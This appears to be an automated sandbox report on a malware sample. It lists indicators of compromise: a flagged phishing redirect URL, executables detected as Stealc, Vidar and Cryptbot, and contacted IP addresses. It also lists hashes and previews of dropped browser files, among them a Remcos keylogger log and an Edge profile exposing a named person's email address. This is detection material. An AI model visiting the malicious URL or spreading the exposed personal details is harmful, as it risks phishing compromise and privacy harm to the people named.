https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t (Detection: malicious; Threat Name: HTMLPhisher)
• 20.190.135.7
• 40.126.29.12
file.exe (Detection: malicious; Threat Name: Cryptbot)
• 20.190.135.7
• 40.126.29.12
Match: 37f463bf4616ecd445d4a1937da06e19
Rechnung_10401.js (Detection: malicious; Threat Name: ScreenConnect Tool)
• 104.21.13.139
• 172.67.200.96
A322mb7u3h.exe (Detection: malicious; Threat Name: Unknown)
• 104.21.13.139
• 172.67.200.96
C6y77dS3l7.exe (Detection: malicious; Threat Name: Unknown)
• 104.21.13.139
• 172.67.200.96
Wiu8X6685m.exe (Detection: malicious; Threat Name: Unknown)
• 104.21.13.139
• 172.67.200.96
WUa1Tm8Dlv.exe (Detection: malicious; Threat Name: Unknown)
• 104.21.13.139
• 172.67.200.96
XOr3Kqyo9n.exe (Detection: malicious; Threat Name: Stealc)
• 104.21.13.139
• 172.67.200.96
AcroCEF.exe (Detection: malicious; Threat Name: Stealc, Vidar)
• 104.21.13.139
• 172.67.200.96
0r9PL33C8E.exe (Detection: malicious; Threat Name: Stealc)
• 104.21.13.139
• 172.67.200.96
Pw2KHOL9Z8.exe (Detection: malicious; Threat Name: Stealc)
• 104.21.13.139
• 172.67.200.96
QkBj8CevLU.exe (Detection: malicious; Threat Name: Stealc, Vidar)
• 104.21.13.139
• 172.67.200.96
No context
Process:C:\Windows\SysWOW64\msiexec.exe
File Type:data
Category:dropped
Size (bytes):606
Entropy (8bit):3.4573380361869503
Encrypted:false
SSDEEP:12:6lZQec0WFe5BWnwAMVWItN2LPjKy4tN2X5y4tN2LPeMl:6rtc0WqBWnwBWIt0ey4tMy4t0dl
MD5:2BB22E75A11921E899FB96FC26050324
SHA1:43724F9DA209456333BF608ACFC33F180BC7049B
SHA-256:FF977CB2F4A009A5F4BB9479A00EB840D6F21E25F502C70136C521E48F020B09
SHA-512:17B80308579DD095661CDA79C76A50B6784250B8F27735206D9DFAD16EC2A2F1F6BA45CCD7030D137FA353E6860AE069A5C9837645D809A26E006A839881A6AB
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview:....[.2.0.2.4./.1.1./.1.1. .0.2.:.1.0.:.5.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.N.e.w. .t.a.b. .-. .P.r.o.f.i.l.e. .1. .-. .M.i.c.r.o.s.o.f.t.. .E.d.g.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.0.5.9.8. .m.i.n.u.t.e.s. .}.........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .3.0.7.4. .m.i.n.u.t.e.s. .}.........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.0.1.4.2. .m.i.n.u.t.e.s. .}.....
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):16220
Entropy (8bit):5.7880850797217
Encrypted:false
SSDEEP:384:Y9iIxuERzA83h09RZxJIPaK8y9b6cZGVKf+qNpuB:DIxuERzA83h09RZxBK8y9b9EKfHNp2
MD5:D5A0338AA9C7EF2B80106106DF8992F5
SHA1:F0654AEA0E37BF8478D00DC822EBCB7A84786729
SHA-256:929336DFBB0EBDE117CC0760BC455A996F7B185E2B59FFB24E8B31DAB7636007
SHA-512:EEF201A0C823956F6CC33E5743D5E9D1D3E45DA27B1A04BE911AE95837427B16E688243BAD1E5C254DC32AF11A5FEFD61AE7268E53E4479A93717CD37E34A7F8
Malicious:false
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_polic
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):14969
Entropy (8bit):5.625902218243038
Encrypted:false
SSDEEP:384:U9iIuERzA83h09RZxeIKrb8y9eIKf+qNrB:/IuERzA83h09RZxub8y9eIKfHNd
MD5:7B169E6533A1190C9D60A7D6DC985A4F
SHA1:FCC541D7DF586A46A6D31E6E08021E58E2A8A710
SHA-256:C65C4D3896A140BC82CDB49A2E3FB1EBECF2373C53D20F82AD195A52E4C5309E
SHA-512:33BC784CE3FD81A545F6D5FD4AC2E1388ADE4FFEBD4955086F95026D248D0AEECE7E95A4942D50FF4EC85281B7517B56EC5D3CE8A853F2A5E13EAD94F14727F4
Malicious:false
Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):107893
Entropy (8bit):4.6401415786958475
Encrypted:false
SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
MD5:8574D972959B295FEA388493B825FDF1
SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
Malicious:false
Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):107893
Entropy (8bit):4.6401415786958475
Encrypted:false
SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
MD5:8574D972959B295FEA388493B825FDF1
SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
Malicious:false
Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                        Entropy (8bit):0.251884157265785
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:f5dhD+2Y3gpjRoxveY5jmVnsQ7AwRG/bRGg1DRqb:f5dhSL3gp5CjmVsQ7A9sg1Y
                                                                                                                                                                                                        MD5:4F5065DAE7045B3300D2C2372216044C
                                                                                                                                                                                                        SHA1:9AEA348AA948E2A0E104B6DF1138826DFA6055F8
                                                                                                                                                                                                        SHA-256:4CC13E357EB790F4A556CC215B2E3852D605E4C08C1BF200B2AF062C0049FF35
                                                                                                                                                                                                        SHA-512:8CD35398D9B3B5375C730439BB139C268B5EA63FAB27CF02B92C52130BB3F36B0B553CDB497988D39074B2C666A0ED4A9C070074FF194CE8871F68A8A7FD8DD4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@...............@...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0......C<>.Z...................C<>.Z..................UMA.PersistentHistograms.DriveType......8...i.y.[".................................................i.y..Yd........A...........................7o.I'.Y.".4.............8o.I'.Y.................UMA.PersistentHistograms.HistogramsInStartupFile........ ...i.y.......7o.I'.Y..C<>.... ...i.y.......7o.I'.Y.7o.I........i.y..Yd........A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.........i.y.Pq.3................94.0.992.31-64".en-US*...Windows NT..10.0.1904224..x86_64..|.......".To Be Filled By O.E.M....x86_64:F..variations_seed_etag.."mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="P....5...............4.>.2...:..............0..,.......TelemetryPopSampleSampling......Default..@..<...%...msAutoToggleMSAPrtSSOForNonMSAProfile.......triggere
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):152
                                                                                                                                                                                                        Entropy (8bit):4.846101405296782
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Fg/fltlK7D2yQ9Bu2jVuDgmWUJ62+I3fdlYl8:qf1KryvpMgmTb3f08
                                                                                                                                                                                                        MD5:4F92EE10C14AB76DB7578B74BFD51FBD
                                                                                                                                                                                                        SHA1:A7F3CD6CA3249B0127EBDD3F02894EFCDC71BD8E
                                                                                                                                                                                                        SHA-256:91BAD29873C51B45151A7BDAE3B1233EA55F063C3592F966FBF5492426B6303B
                                                                                                                                                                                                        SHA-512:8DB464088823EAA5A73108453ECFD61F87251EA617D0C62B664EE0AD6288AA86126FEBB50B4AD3F0E126C844EDE01177705384B4B05DE54AB030879CC9342005
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:sdPC....................+.^..h#A...0.ER."mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="..................baf89b04-ec85-4201-8b33-0b186effe467............
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24087
                                                                                                                                                                                                        Entropy (8bit):5.590112296681691
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:1sfCtaFZKhOObJ+UoAYDCx9TuqZz0VfUCh7xbog/OVaLlg9RCqrU1VvPpIpUOIj7:1eWGZ8F1+UoAYDCx9Tuqh0VfUC9xbogT
                                                                                                                                                                                                        MD5:8D19EAA746333559D93B1F5F2DF3692E
                                                                                                                                                                                                        SHA1:075771A8F706EE4ACFDC38559A9FD8E931FC6D6E
                                                                                                                                                                                                        SHA-256:0BBC927747BA50FD850C8C47BDE5C71685F5CBC4B9CAD7336FE21F3078148206
                                                                                                                                                                                                        SHA-512:97087912B28346934707DD60DF912A18FFDF3AE65BEA1EA2ACDB47A7C1413AD68253AAD96B76D1A7683E17ED5CFF7DFD179C98826AF12F2C4D67E76E964CDAC0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13375782671206215","location":5,"manifest":{"content_capabilities":{"include_globs":["https://*excel.officeapps.live.com/*","https://*onenote.officeapps.live.com/*","https://*powerpoint.officeapps.live.com/*","https://*word-edit.officeapps.live.com/*","https://*excel.partner.officewebapps.cn/*","https://*onenote.partner.officewebapps.cn/*","https://*powerpoint.partner.officewebapps.cn/*","https://*word-edit.partner.officewebapps.cn/*","https://*excel.gov.online.office365.us/*","https://*onenote.gov.online.office365.us/*","https://*powerpoint.gov.online.office365.us/*","https://*word-edit.gov.online.office365.us/*","https://
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:MS Windows icon resource - 8 icons, 16x16, 32 bits/pixel, 20x20, 32 bits/pixel
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):71757
                                                                                                                                                                                                        Entropy (8bit):6.771708343960135
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:vAlMWz7vLDtDSVlXXwpFlorgLUxF+D4n6owPFCawP/:vvuWAUxFaoGw/
                                                                                                                                                                                                        MD5:E5E3377341056643B0494B6842C0B544
                                                                                                                                                                                                        SHA1:D53FD8E256EC9D5CEF8EF5387872E544A2DF9108
                                                                                                                                                                                                        SHA-256:E23040951E464B53B84B11C3466BBD4707A009018819F9AD2A79D1B0B309BC25
                                                                                                                                                                                                        SHA-512:83F09E48D009A5CF83FA9AA8F28187F7F4202C84E2D0D6E5806C468F4A24B2478B73077381D2A21C89AA64884DF3C56E8DC94EB4AD2D6A8085AC2FEB1E26C2EF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............ .h............. ............... ......... .... .........((.... .h....%..00.... ..%..>@..@@.... .(B...e........ .?p......(....... ..... ..........................................w...x...y...v...j...c...\...N...........................w.<.w...y...x...]...P...M...N...N...N...M...H.<.............w.<.w...y...{...]...P...O...Q...R...P...O...N...K...H.<.........w...y...{...p...P...P...Q...S...Q...P..N...N..K...K.......w...y...{...|...i...Q...P...S...R.......................I.W.....y...{...}.......c...Q...Q...U.W......3<..6.i.?.V.D.L.L.@.Q<.....{...}..........n...P...S............3.7...;.f.B.P.P.D.U.8.[W.}................P...P.s..........3...7...<.g.H.c.O.R.Y.?.].................u...J...........6..8...?...E.o.O.U.W.L._..............................$...7...@...J.o.O.b.].L.f..+...........................*...0...;...J...S.h.].X.e.../..0.................!...*...*...2...<...G...P.i.g.Y.m.......1..2..0...0.......+...*...*...1...8...C...M.~.^.m.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9000
                                                                                                                                                                                                        Entropy (8bit):4.994257462742733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:18XcUTNk9jPcAWMdkxoouYI3+YJuRhFeB/NhK9:2cUTNk9jPcAWMdaooVIS/me9
                                                                                                                                                                                                        MD5:3CB1586353968B52F028A678ED76E36E
                                                                                                                                                                                                        SHA1:CA5D7CF1919B126888AE487BEF587ABA56CFC4C9
                                                                                                                                                                                                        SHA-256:14842C0CB079FF70AC52A3DDEB82275D34E792F24A8CF9E229C3755A7014B382
                                                                                                                                                                                                        SHA-512:DA5462C205157B953A8A2D87430C910B2B09ED2701D2110EA6A9AA0BC8CAC303479B2E09B87B069E1B30B29FFE70565BE544944D0CBF2E3255A80EEDFA30F54A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"account_id_migration_state":2,"account_info":[{"account_id":"000340011677ED77","accountcapabilities":{"can_offer_extended_chrome_sync_promos":-1},"edge_account_age_group":3,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_is_test_on_premises_profile":false,"edge_account_last_name":"Shapira","edge_account_location":"CH","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_data_protection_type":0,"edge_is_data_protection_target":false,"edge_wam_aad_for_app_account_type":0,"email":"shahak.shapira@outlook.com","full_name":"","gaia":"000340011677ED77","given_name":"","hd":"","is_supervised_child":-1,"is_under_advanced_protection":false,"last_downloaded_image_url_with_size":"","locale":"","picture_url":""}],"account_tracker_service_last_update":"13335737597040910","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7894
                                                                                                                                                                                                        Entropy (8bit):4.959704904517735
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:s72TNk9jPcAWMdkEDouYI3+YJuRhH9rnhuI:s72TNk9jPcAWMdxDoVISFuI
                                                                                                                                                                                                        MD5:79E7A26B13E79E2690287A22731F3584
                                                                                                                                                                                                        SHA1:F4303F5F2A8245FBD56678E0EB388E4EF3F9F62E
                                                                                                                                                                                                        SHA-256:CA85A60D708526521DBD49F4C0D0E374B4BFD1D74A6BBBBC0882B097EC3FB6F2
                                                                                                                                                                                                        SHA-512:C5BD1F656D8F352AF1F26F3DC4C1E0F6D267557C8CFF0698F2EA484D33EAD264FDA4857D97AF6E90F24E5D417F167B585B2A90590A0339077C9E2AD31F559B41
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_info":[],"account_tracker_service_last_update":"13375782671418792","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles":{"browser_name":6,"is_AutoFillFormData_imported":true,"is_Cookies_imported":true,"is_Extensions_imported":true,"is_Favorite_imported":true,"is_History_imported":true,"is_Payments_imported":true,"is_SavedPasswords_imported":true,"is_Settings_imported":true,"source_path":"C:\\Users\\user\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default"}},"imported_default_search_engine":"https://www.bing.com/search?q={searchTerms}&FORM={referrer:source}"},"autocomplete":{"retention_policy_last_version":94},"autofill":{"orphan_rows_removed":true},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_norm
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 11, database pages 7, 1st free page 5, free pages 2, cookie 0x9, schema 4, UTF-8, version-valid-for 11
Category:modified
Size (bytes):28672
Entropy (8bit):1.5266981766347234
Encrypted:false
SSDEEP:96:sn5HGseXijqO6ng5G3gtzT6CAjwD+rTswhA/0jNMpY:s5m1ij5Mgg3c2CbIswu/0jNMpY
MD5:09217A57548ACACF6C531262D920451F
SHA1:FEB214AADB48C1BA30E9C2D0EFF8A6E66868054B
SHA-256:7600BFF6A1381441C06923059C5E84F3A4E4DF5FADFEE4D40D6DD92050E94B84
SHA-512:9CB25DCFD906FC5DB7E8BF8E4BD2F740480A978DA6286E39FFE28413E76CD05838CE0CABD8FCA86541CFFE766B52D8AE35B6CF8A1D52D2FA6F7D6E79038EDB0E
Malicious:false
Preview:SQLite format 3......@ ..........................................................................S`..=......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:MS Windows icon resource - 8 icons, 16x16, 32 bits/pixel, 20x20, 32 bits/pixel
Category:dropped
Size (bytes):71757
Entropy (8bit):6.771708343960135
Encrypted:false
SSDEEP:1536:vAlMWz7vLDtDSVlXXwpFlorgLUxF+D4n6owPFCawP/:vvuWAUxFaoGw/
MD5:E5E3377341056643B0494B6842C0B544
SHA1:D53FD8E256EC9D5CEF8EF5387872E544A2DF9108
SHA-256:E23040951E464B53B84B11C3466BBD4707A009018819F9AD2A79D1B0B309BC25
SHA-512:83F09E48D009A5CF83FA9AA8F28187F7F4202C84E2D0D6E5806C468F4A24B2478B73077381D2A21C89AA64884DF3C56E8DC94EB4AD2D6A8085AC2FEB1E26C2EF
Malicious:false
Preview:............ .h............. ............... ......... .... .........((.... .h....%..00.... ..%..>@..@@.... .(B...e........ .?p......(....... ..... ..........................................w...x...y...v...j...c...\...N...........................w.<.w...y...x...]...P...M...N...N...N...M...H.<.............w.<.w...y...{...]...P...O...Q...R...P...O...N...K...H.<.........w...y...{...p...P...P...Q...S...Q...P..N...N..K...K.......w...y...{...|...i...Q...P...S...R.......................I.W.....y...{...}.......c...Q...Q...U.W......3<..6.i.?.V.D.L.L.@.Q<.....{...}..........n...P...S............3.7...;.f.B.P.P.D.U.8.[W.}................P...P.s..........3...7...<.g.H.c.O.R.Y.?.].................u...J...........6..8...?...E.o.O.U.W.L._..............................$...7...@...J.o.O.b.].L.f..+...........................*...0...;...J...S.h.].X.e.../..0.................!...*...*...2...<...G...P.i.g.Y.m.......1..2..0...0.......+...*...*...1...8...C...M.~.^.m.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):339
Entropy (8bit):5.2497849182720415
Encrypted:false
SSDEEP:6:HUz1fPoW8+q2PCN23oH+Tcwtn1QzDdIFUt8YUz1fPoWBZmw+YUz1fPoWVVkwOCNh:+1fw6v1YebnuKFUt8Z1fwe/+Z1fwS5eY
MD5:A375BF2734D46602C5E80ED295359536
SHA1:E7DC64ECF5CD7B70912657B9FA1AC78625B3808C
SHA-256:9B6485CBA9A5EB5C5CD10F3C4CB9D1F0D9DA79EE1CE0FA72797B2C8AC647F79A
SHA-512:2B23B7BEA05E7CDAE44ECB7B1268D72D50B90CDE59BF37DA31549EF62EBF639CC5C96D389D3E5DE3465A3B9FC2875BBB7BF8C75FBCAD2756F614AC64CFBD32B8
Malicious:false
Preview:2024/11/11-02:11:13.934 c68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt/MANIFEST-000001.2024/11/11-02:11:13.935 c68 Recovering log #3.2024/11/11-02:11:13.935 c68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):627
Entropy (8bit):1.8784775129881184
Encrypted:false
SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
MD5:9D7435EA49A80FDD66E4915F513017F9
SHA1:469F6C6E4B19B85CC1BE497812B2F20864F4FF2C
SHA-256:409D4C47E940688527D730B996E8991E010988C7671565467ED69D640D0947F3
SHA-512:0561CD632D4219AEF4686DE40EC092921384CA89755D354801E0EAEC8645A8630A180807AF518AC8FCF01F71EB3D10FAA9CE1E62C7A7226A274975BDCB7EEB4C
Malicious:false
Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):321
Entropy (8bit):5.0791018117750255
Encrypted:false
SSDEEP:6:HUz1fNqf4q2PCN23oH+Tcwt8NIFUt8YUz1fNqfJZmw+YUz1fNNzkwOCN23oH+TcN:+1fNqf4v1YebpFUt8Z1fNqfJ/+Z1fNNj
MD5:0CB622BDD99BF49F83197B305C491FD3
SHA1:7F41A4C93D06685F4F753A28CA67063D4FA139E3
SHA-256:D94322DB2D959A26E2228AD01A4C580A2AF1C50FAD69A326BD2582FA2473AD6E
SHA-512:CC3332E955A0009DA147E9A47E08A8BC64C10216A5058B030A6D3E5D758DE122BC8CCD075BA99E1432C536A004279035D54D13DD56FA946AE044CC8BB0343061
Malicious:false
Preview:2024/11/11-02:11:11.551 330 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/11-02:11:11.551 330 Recovering log #3.2024/11/11-02:11:11.552 330 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 10, cookie 0x8, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):2.0163009390428934
Encrypted:false
SSDEEP:48:rBmw6fU1zBGqOBo7qJHEKuRdvCQVvpmkZtb78rnjOiWDMv9IgX7FqOWys/7J8q:rBCyGbmzRvOOiZ9TLFbO/Kq
MD5:B99244A062C0567091790DB0DF397E29
SHA1:3C7BE2D8FCDA83A15E1220FCD7A68C26AFFB3AF3
SHA-256:F495C356FCF7C0C4826F636835022D3D43D532AD5541A0EA79761A12BD0F1905
